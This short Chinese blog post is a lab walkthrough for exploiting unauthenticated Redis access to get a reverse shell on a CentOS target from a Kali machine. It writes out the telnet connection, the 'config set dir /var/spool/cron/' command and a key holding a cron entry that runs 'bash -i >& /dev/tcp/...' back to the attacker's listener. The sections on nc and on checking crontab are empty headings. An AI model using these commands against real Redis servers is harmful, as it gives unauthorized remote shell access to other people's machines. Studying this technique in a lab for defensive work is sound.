Redis未授权访问之反弹shell

Redis未授权访问之反弹shell

靶机:centos6.5

公鸡:Kali

一、crontab基础姿势

Crontab定时任务配置 - 潇湘隐者 - 博客园

二、redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

telnet 192.168.236.130 6379 //未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell,换行是必不可少的。

三、nc反弹

四、Centos里面查看crontab任务。

发布于 2017-01-25